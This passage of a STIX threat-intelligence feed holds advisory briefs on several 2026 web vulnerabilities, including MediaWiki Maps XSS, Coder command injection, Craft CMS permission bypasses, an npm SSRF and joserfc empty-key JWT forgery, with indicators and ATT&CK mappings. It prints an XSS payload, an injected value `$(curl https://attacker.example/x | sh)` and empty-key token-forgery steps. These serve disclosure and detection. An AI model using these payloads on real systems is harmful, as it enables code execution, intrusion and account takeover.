      "description": "## Overview\n\nThis brief details CVE-2026-52854, a high-severity stored cross-site scripting (XSS) vulnerability discovered in the MediaWiki Maps extension, specifically affecting versions prior to 12.1.3. The vulnerability stems from improper handling of the `overlays` parameter within the `display_map` parser function when utilizing the 'leaflet' service. The Maps extension fails to adequately escape user-supplied overlay names before they are passed to the Leaflet JavaScript library, which then renders these unescaped inputs as HTML. This flaw allows any authenticated user with `edit` permissions to inject and store arbitrary client-side JavaScript code into wikitext. This code will then execute in the browser of any user viewing the affected page, potentially leading to session hijacking, credential theft, or further client-side attacks against visitors of the MediaWiki instance. The issue was published on 2026-07-02.\n\n## Attack Chain\n\n1.  An attacker gains authenticated access to a MediaWiki instance with `edit` permissions.\n2.  The attacker navigates to an existing wiki page or creates a new one to edit its content.\n3.  The attacker crafts and inserts malicious wikitext into the page content, specifically utilizing the `display_map` parser function.\n4.  Within the `display_map` function, the attacker sets the `service` parameter to `leaflet`.\n5.  The attacker injects a JavaScript payload (e.g., `\u003cimg src=x onerror=\"alert(1);\"\u003e`) into the `overlays` parameter, like `overlays=OpenTopoMap.\u003cimg src=x onerror=\"alert(1);\"\u003e`.\n6.  The attacker saves or previews the modified wiki page, causing the MediaWiki application to process the wikitext.\n7.  The Maps extension passes the unescaped `overlays` value directly to the Leaflet JavaScript library when rendering the map.\n8.  When a victim views the affected wiki page, their browser renders the malicious HTML supplied by the Leaflet library, executing the injected JavaScript code in the victim's browser context.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-52854 results in stored cross-site scripting, enabling an attacker with `edit` permissions to execute arbitrary JavaScript code in the context of a victim's browser. This can lead to various malicious outcomes, including session hijacking, defacement of web pages, redirection to phishing sites, or further client-side attacks designed to steal sensitive user data or credentials. While no specific victim count or targeted sectors are mentioned, any MediaWiki instance running the vulnerable Maps extension (versions prior to 12.1.3) is susceptible, potentially impacting all users who view pages containing the injected content.\n\n## Recommendation\n\n*   Patch CVE-2026-52854 immediately by updating the `composer/mediawiki/maps` extension to version 12.1.3 or higher.\n*   Deploy the `Detect CVE-2026-52854 Exploitation Attempt — MediaWiki Maps XSS Injection` Sigma rule provided in this brief to your SIEM and tune for your environment.\n*   Enable comprehensive web server logging to capture `cs-uri-query` and `cs-method` for all requests, especially those made to editing endpoints.\n*   Implement a Web Application Firewall (WAF) to detect and block common XSS payloads in request parameters and body content.\n",
      "published": "2026-07-03T11:51:24Z",
      "labels": [
        "xss",
        "mediawiki",
        "web-vulnerability",
        "web-application"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-4h7g-5542-v3fc"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6807c10b-6c7b-5ea9-ba7d-de7a11e936ba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: attacker.example",
      "pattern": "[domain-name:value = 'attacker.example']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T11:50:24Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--56f74595-8acf-53b9-9870-ff0ae3f2fac6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9d47d7dd-9ae6-5a83-808e-61ed2d29c3f4",
      "target_ref": "indicator--6807c10b-6c7b-5ea9-ba7d-de7a11e936ba"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9a26c2b3-c8ba-5334-a8a2-d917cbab63ef",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://attacker.example/x",
      "pattern": "[url:value = 'https://attacker.example/x']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T11:50:24Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--15010b02-f70b-5da3-89e8-6dc7382bf9fa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9d47d7dd-9ae6-5a83-808e-61ed2d29c3f4",
      "target_ref": "indicator--9a26c2b3-c8ba-5334-a8a2-d917cbab63ef"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bbbbe654-694f-53f6-8b0c-3a722d20abf8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9d47d7dd-9ae6-5a83-808e-61ed2d29c3f4",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9876a111-07de-5077-8b6b-ed5cc30073d6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9d47d7dd-9ae6-5a83-808e-61ed2d29c3f4",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9d47d7dd-9ae6-5a83-808e-61ed2d29c3f4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Coder vulnerable to workspace auto-creation via crafted URL parameters without user consent",
      "description": "## Overview\n\nThe Coder platform, a developer workspace environment, is affected by a critical command injection vulnerability (CVE-2026-44454) present in its `dotfiles` module within the `coder/registry` component. Disclosed by Aviv Donenfeld and published on 2026-07-02, this flaw arises because the module directly interpolates unsanitized user-provided `dotfiles_uri` values into shell commands, allowing for arbitrary code execution. This vulnerability is amplified by the `mode=auto` feature on the Create Workspace page of the `coder/coder` application (versions prior to 2.29.7, and 2.30.0 through 2.30.1), which enables a one-click attack. An authenticated user clicking a specially crafted URL can trigger silent workspace creation with a malicious `dotfiles_uri`, leading to immediate RCE within their provisioned workspace. The vulnerability impacts customer instances of Coder and can lead to compromise of developer environments and sensitive data.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious URL targeting a victim's Coder deployment, including `mode=auto` and a `param.dotfiles_uri` value containing shell metacharacters and arbitrary commands (e.g., `foo$(curl https://attacker.example/x | sh).com`).\n2.  The attacker delivers this URL to an authenticated Coder user (e.g., via email or messaging).\n3.  The victim clicks the crafted URL, which directs their browser to the Coder Create Workspace page.\n4.  Due to the `mode=auto` parameter, the Coder platform bypasses the confirmation prompt and automatically initiates the creation of a new workspace, pre-filling parameters including the attacker-controlled `param.dotfiles_uri`.\n5.  During the workspace provisioning process, the `dotfiles` module in `coder/registry` attempts to process the provided `dotfiles_uri`.\n6.  The unsanitized `dotfiles_uri` value is directly expanded by a shell, leading to command injection and the execution of the attacker's arbitrary commands (e.g., `curl https://attacker.example/x | sh`) within the context of the newly created workspace.\n7.  The attacker's arbitrary code gains execution inside the victim's workspace, establishing a foothold for further malicious activities.\n8.  The attacker can then access Git credentials, secrets, workspace files, or perform lateral movement within the Coder environment, achieving the final objective.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-44454 leads to arbitrary code execution within the victim's Coder workspace. This can result in the compromise of sensitive data, including Git credentials, API keys, and other secrets stored within the development environment, as well as the exfiltration of source code and other workspace files. Depending on the privileges assigned to the compromised workspace, this could also provide a significant foothold for lateral movement into connected systems or cloud infrastructure. The \"one-click\" nature of the `mode=auto` amplification vector significantly lowers the bar for exploitation, requiring only that an authenticated user interacts with a malicious link, making it a severe threat to organizations utilizing the Coder platform.\n\n## Recommendation\n\n*   Patch Coder deployments immediately by upgrading `coder/coder` to at least version `v2.29.7` (ESR) or `v2.30.2` (mainline) to implement the consent dialog for `mode=auto` and to apply the primary fix for CVE-2026-44454.\n*   Deploy the provided Sigma rule to detect attempts at exploiting CVE-2026-44454 in webserver logs.\n*   Monitor webserver logs for `cs-uri-query` containing `mode=auto` and `param.dotfiles_uri` with shell metacharacters, as identified in the Sigma rule.\n*   Block the C2 domain `attacker.example` listed in the IOC table at the DNS resolver and perimeter firewalls.\n",
      "published": "2026-07-03T11:50:24Z",
      "labels": [
        "command-injection",
        "rce",
        "web-application",
        "workspace",
        "cloud",
        "coder"
      ],
      "object_refs": [
        "indicator--6807c10b-6c7b-5ea9-ba7d-de7a11e936ba",
        "indicator--9a26c2b3-c8ba-5334-a8a2-d917cbab63ef",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-m3cr-vc2j-pm27"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/coder/registry/pull/703"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/coder/coder/commit/60e3ab7632f42415d283b9fd5622ee53a4639ceb"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/coder/coder/pull/22011"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/coder/coder/releases/tag/v2.29.7"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/coder/coder/releases/tag/v2.30.2"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a4317657-ff5e-536b-b0ed-d32c7bd6a876",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3aad7289-47a3-5c00-9c16-20bb275a1e12",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Defacement",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--011a16a2-c3a0-53cb-b6e6-ecb2bd0fed45",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3aad7289-47a3-5c00-9c16-20bb275a1e12",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3aad7289-47a3-5c00-9c16-20bb275a1e12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Craft CMS Authorship Spoofing via Authorization Bypass (CVE-2026-50279)",
      "description": "## Overview\n\nCVE-2026-50279 details an authorization bypass vulnerability in Craft CMS versions prior to 5.9.21. Specifically, the `EntriesController::actionSaveEntry()` function performs crucial entry-edit permission checks *before* any attacker-supplied author changes are applied to the entry model. Due to this pre-mutation authorization check, a low-privileged user who is authenticated, has permission to edit an entry, and is listed as one of its existing authors (or satisfies `canChangeAuthor()` through peer entry permissions) can submit a request with crafted `authors` or `author` parameters. The controller then fails to re-run authorization after the author list has been mutated, allowing the unauthorized change to persist. This vulnerability allows falsification of content ownership, corrupting audit trails, sending misleading notifications, and breaking approval workflows within the CMS.\n\n## Attack Chain\n\n1.  A low-privileged authenticated user crafts an HTTP POST request targeting the `/entries/save-entry` endpoint of a vulnerable Craft CMS instance.\n2.  The request includes parameters (`authors` or `author`) attempting to change the entry's author to a different user, for which the attacker does not hold explicit author-management permission.\n3.  The `actionSaveEntry()` function in `EntriesController.php` loads the target entry and performs initial edit permission checks based on the *original* entry state and the attacker's existing permissions (e.g., being an existing author of the entry).\n4.  The `_populateEntryModel()` helper function then processes the request, updating the entry model's `authorIds` attribute with the attacker-supplied values, critically *before* authorization for this specific author change is re-evaluated.\n5.  The `canChangeAuthor()` method is invoked and returns `true` because it evaluates against the old authorship state, where the current user is still considered one of the existing authors or meets other conditions like `viewPeerEntries` for the section.\n6.  The entry's author list is internally mutated within the model with the new, unauthorized `authorIds` provided by the attacker.\n7.  The controller proceeds without re-running comprehensive authorization checks on the *new* author assignment, assuming the initial check was sufficient.\n8.  The `saveElement()` and `_saveAuthors()` methods persist the altered author relationship to the database, resulting in the entry now appearing authored by the user specified by the attacker, effectively spoofing content ownership and compromising data integrity.\n\n## Impact\n\nThe successful exploitation of CVE-2026-50279 allows low-privileged users to falsify content ownership and alter the authorship of entries without possessing the dedicated author-management permission. This leads to several critical impacts including corrupted audit trails, where the true historical author of content is obscured, misleading notifications being sent to incorrect users, broken approval workflows as content changes may bypass designated reviewers, and unauthorized reassignment of content responsibility. This can severely undermine trust in the CMS content and its operational processes.\n\n## Recommendation\n\n*   Patch CVE-2026-50279 immediately by updating all Craft CMS installations to version 5.9.21 or later.\n*   Review application logs for the vulnerable `/entries/save-entry` (identified in IOCs) endpoint for unusual POST requests originating from low-privileged user accounts, especially those containing `authors` or `author` parameters, and investigate any successful changes in content ownership.\n",
      "published": "2026-07-03T11:49:22Z",
      "labels": [
        "authorship-spoofing",
        "authorization-bypass",
        "web-application",
        "craft-cms",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-qq2c-2q8j-jh27"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Destruction",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1485",
          "url": "https://attack.mitre.org/techniques/T1485"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--679b1323-432d-57fd-b6a4-38026238a295",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0304ea41-4979-5f59-9b19-fef93c0745e7",
      "target_ref": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--0304ea41-4979-5f59-9b19-fef93c0745e7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Craft CMS Vulnerability Allows Low-Privilege Users to Delete Peer Assets",
      "description": "## Overview\n\nA critical vulnerability (CVE-2026-50284) has been identified in Craft CMS, affecting versions 4.x before 4.17.15 and 5.x before 5.9.22. This flaw, residing in the `AssetsController::actionDeleteFolder` function, allows low-privilege users with `deleteAssets` permission on a shared volume to bypass intended security controls. Specifically, the system fails to enforce `deletePeerAssets` checks when deleting folders, enabling these users to permanently destroy assets uploaded and owned by other users on the same volume. This bypasses Craft CMS's explicit permission model, which aims to distinguish between a user's ability to delete their own assets versus peer-owned assets. The vulnerability can lead to significant data integrity and availability issues, as peer assets can be deleted without recourse through the Craft CMS UI. The issue is similar to a previous fix in `actionMoveFolder` but was not applied to the delete function.\n\n## Attack Chain\n\n1. An administrator grants a low-privilege Craft CMS user `deleteAssets:\u003cvolume-uid\u003e` permission for a specific asset volume, but explicitly *does not* grant `deletePeerAssets:\u003cvolume-uid\u003e`.\n2. The low-privilege user, intending to delete peer-owned assets, sends an authenticated HTTP POST request to the `/admin/assets/delete-folder` endpoint.\n3. The request body includes the `folderId` of a folder located within the permitted volume and containing assets uploaded by other users.\n4. The `AssetsController::actionDeleteFolder` function executes `requireVolumePermissionByFolder('deleteAssets', $folder)`, which successfully validates the user's `deleteAssets` permission.\n5. The function proceeds to call `Assets::deleteFoldersByIds($folderId)`, which iterates through all descendant folders and assets within the target folder.\n6. For each identified asset (including peer-owned ones), `Assets::deleteFoldersByIds` directly invokes `Craft::$app-\u003egetElements()-\u003edeleteElement($asset, true)`.\n7. This direct invocation of `deleteElement` bypasses the `Asset::canDelete()` function, which contains the intended `deletePeerAssets` check for individual asset deletions.\n8. Consequently, peer-owned assets within the specified folder are permanently removed from the underlying filesystem and become inaccessible via Craft CMS.\n\n## Impact\n\nThis vulnerability directly impacts the data integrity and availability of shared asset volumes within Craft CMS environments. Any low-privilege user granted `deleteAssets` permission, without `deletePeerAssets`, can exploit this flaw to permanently destroy files uploaded by other users. This circumvents a fundamental aspect of Craft's permission model, designed to prevent unauthorized deletion of peer data. The consequence is potential data loss and disruption to content operations. While no information disclosure or remote code execution is involved, the inability to distinguish between owned and peer assets for deletion undermines administrative control and can lead to irreversible damage to an organization's digital assets. The impact is broad for any Craft CMS installation utilizing shared asset volumes and differential permissions.\n\n## Recommendation\n\n*   Patch CVE-2026-50284 by upgrading Craft CMS to version 4.17.15 (for 4.x) or 5.9.22 (for 5.x) or higher immediately to remediate the vulnerability.\n*   Review all user permissions within Craft CMS, specifically focusing on the `deleteAssets` and `deletePeerAssets` permissions for shared asset volumes, to ensure they align with intended security policies.\n",
      "published": "2026-07-03T11:48:25Z",
      "labels": [
        "craft-cms",
        "vulnerability",
        "privilege-escalation",
        "data-deletion",
        "web-application"
      ],
      "object_refs": [
        "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-7h62-6v23-v8fm"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5ac8a723-51cb-5149-9807-0f6b8e72df9f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--90857173-1980-5945-a05a-62515936d8a3",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--90857173-1980-5945-a05a-62515936d8a3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "@asymmetric-effort/specifyjs: URL Parse Failure Silently Allows Request (CVE-2026-50288)",
      "description": "## Overview\n\nA critical vulnerability, tracked as CVE-2026-50288, has been identified in the `@asymmetric-effort/specifyjs` npm package, specifically affecting versions prior to 0.2.136. This flaw resides within the `assertSecureUrl` function, intended to enforce HTTPS validation for URLs. The vulnerability occurs because the function's `catch` block for `new URL()` parse errors silently returns without re-throwing the error, effectively bypassing security checks. This oversight allows requests for malformed URLs to proceed without proper HTTPS validation, potentially enabling Server-Side Request Forgery (SSRF) attacks. Defenders should be aware that applications utilizing vulnerable versions of this library are susceptible to requests being directed to unintended or malicious destinations, jeopardizing internal network security and data integrity.\n\n## Attack Chain\n\n1.  An attacker identifies an application that uses the `@asymmetric-effort/specifyjs` library, specifically a vulnerable version (prior to 0.2.136).\n2.  The attacker crafts a specially malformed URL that will cause `new URL()` to throw a parse error when processed by the `assertSecureUrl` function.\n3.  The attacker sends this crafted URL to the vulnerable application, likely through a user-controlled input field that expects a URL.\n4.  The application processes the input URL using the `assertSecureUrl` function for security validation.\n5.  During validation, `new URL()` throws an error due to the malformed input provided by the attacker.\n6.  Instead of re-throwing the error or blocking the request, the `assertSecureUrl` function's `catch` block silently returns, indicating success despite the parse failure and lack of HTTPS validation.\n7.  The application proceeds to make a request to the unvalidated, and potentially attacker-controlled, internal or external endpoint.\n8.  This successful bypass enables Server-Side Request Forgery (SSRF), allowing the attacker to access or manipulate internal resources, conduct port scanning, or exfiltrate sensitive data.\n\n## Impact\n\nThe primary impact of CVE-2026-50288 is the potential for Server-Side Request Forgery (SSRF) within applications using vulnerable versions of the `@asymmetric-effort/specifyjs` library. Successful exploitation can allow attackers to force the compromised application server to make requests to internal services, retrieve sensitive data from internal systems (e.g., cloud metadata APIs, internal web services), bypass firewalls, or conduct port scanning of the internal network. Depending on the application's privileges and network access, this can lead to data exfiltration, further compromise of internal systems, or unauthorized actions against other resources, significantly impacting the confidentiality and integrity of the organization's data.\n\n## Recommendation\n\n*   Prioritize patching CVE-2026-50288 by upgrading `@asymmetric-effort/specifyjs` to version 0.2.136 or higher immediately. Refer to the GitHub Advisory Database reference for CVE-2026-50288.\n*   Review your application's dependency tree to identify any instances of `@asymmetric-effort/specifyjs` at versions earlier than 0.2.136 and ensure all affected packages are updated.\n",
      "published": "2026-07-03T11:47:22Z",
      "labels": [
        "npm",
        "supply-chain",
        "vulnerability",
        "ssrf",
        "javascript"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-8882-frvv-92w4"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/asymmetric-effort/specifyjs/commit/25d1fb4"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/asymmetric-effort/specifyjs/releases/tag/v0.2.136"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0ee35cd4-e8bc-5209-9356-ab0f3286ad74",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c6b8ae9c-38eb-5a26-901c-349683029f22",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c6b8ae9c-38eb-5a26-901c-349683029f22",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "joserfc: HS256/HS384/HS512 verify accepts empty/nil HMAC key (CVE-2026-49852)",
      "description": "## Overview\n\nA significant vulnerability, CVE-2026-49852, has been identified in the `joserfc` Python library (versions `\u003c= 1.6.7`), allowing for complete authentication bypass. This flaw, a cross-language sibling of CVE-2026-45363 affecting `ruby-jwt`, enables an unauthenticated attacker to forge valid HMAC-signed JSON Web Tokens (HS256, HS384, HS512) without any secret knowledge. The vulnerability arises when an application using `joserfc.jwt.decode` inadvertently supplies an empty string or `None` as the HMAC verification key. This misconfiguration commonly occurs when keys are sourced from unset environment variables, missing database entries, or fallbacks that return empty values. Although `joserfc` issues a `SecurityWarning` for short keys, it does not reject zero-length keys, leading to successful verification of attacker-crafted tokens and unauthorized access.\n\n## Attack Chain\n\n1.  **Application Misconfiguration**: A Python application using `joserfc` is configured such that its JWT HMAC verification key resolves to an empty string (`\"\"`) or `None` (e.g., `os.environ.get(\"JWT_SECRET\", \"\")` if `JWT_SECRET` is unset).\n2.  **Attacker Crafts Claims**: The attacker creates a JSON payload with arbitrary claims (e.g., `{\"sub\": \"attacker\", \"admin\": True}`).\n3.  **Attacker Prepares JWT**: The attacker constructs the JWT header (`{\"alg\": \"HS256\", \"typ\": \"JWT\"}`) and the crafted payload, then Base64Url-encodes them to form the `signing_input`.\n4.  **Attacker Signs with Empty Key**: The attacker generates an HMAC signature by hashing the `signing_input` using an empty key (`hmac.new(b\"\", signing_input, hashlib.sha256).digest()`).\n5.  **Attacker Submits Forged Token**: The attacker concatenates the header, payload, and the empty-key signature into a full JWT and submits it to the vulnerable application.\n6.  **Application Attempts Verification**: The application receives the forged JWT and attempts to verify it using `joserfc.jwt.decode`, which retrieves the misconfigured empty key.\n7.  **Vulnerable Verification**: `joserfc`'s `HMACAlgorithm.verify` uses the empty key to re-compute the HMAC digest, which matches the attacker's empty-key signature.\n8.  **Unauthorized Access**: The `joserfc` library successfully decodes the forged token, allowing the application to grant the attacker unauthorized access with the arbitrary claims, such as elevated administrative privileges.\n\n## Impact\n\nThe vulnerability in `joserfc` allows for a complete authentication bypass, enabling unauthenticated attackers to forge arbitrary claims, including user roles, scopes, and expiration times. This directly leads to unauthorized access to protected resources and potential privilege escalation on any service utilizing the `joserfc` library with a misconfigured empty HMAC key. While the precondition for exploitation requires an operator misconfiguration (e.g., an unset environment variable), the silence of the misconfiguration (only a `SecurityWarning` is emitted, not an error) makes it a critical threat. The vulnerability has a CVSS 3.1 score of 7.4 (High), indicating significant confidentiality and integrity impact due to the authentication bypass.\n\n## Recommendation\n\n*   **Patch CVE-2026-49852**: Urgently update the `joserfc` library to a patched version once available. Monitor the `Authlib` GitHub repository and PyPI for the release.\n*   **Review Secret Management**: Implement strict controls to ensure that JWT secrets are never empty strings or `None` when retrieved from environment variables, configuration files, or key finders. Ensure that `OctKey.import_key` always receives a non-empty, sufficiently long secret.\n*   **Implement Key Length Validation**: Manually implement a check for key length (e.g., `if not key or len(key) \u003c 14: raise ValueError(\"HMAC key invalid\")`) before passing it to `joserfc.jwt.decode` if an immediate upgrade is not possible.\n*   **Inventory `joserfc` Usage**: Scan your codebase for all instances of `joserfc.jwt.decode` and the versions of the `joserfc` package (`pip/joserfc`) deployed in your environment, particularly those running versions `\u003c= 1.6.7`.\n",
      "published": "2026-07-03T11:46:24Z",
      "labels": [
        "authentication-bypass",
        "jwt",
        "python",
        "vulnerability",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-gg9x-qcx2-xmrh"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/authlib/joserfc-ghsa-gg9x-qcx2-xmrh/pull/1"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--06205d56-9251-5c3d-925a-2cd72055d72b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4469d7ea-05dc-5896-97ee-bab1f2671f31",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--129ab004-8104-5141-ad26-f673eb0350f9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4469d7ea-05dc-5896-97ee-bab1f2671f31",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4469d7ea-05dc-5896-97ee-bab1f2671f31",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Grackle AI Runtime-SDK RCE via Git Worktree Command Injection",
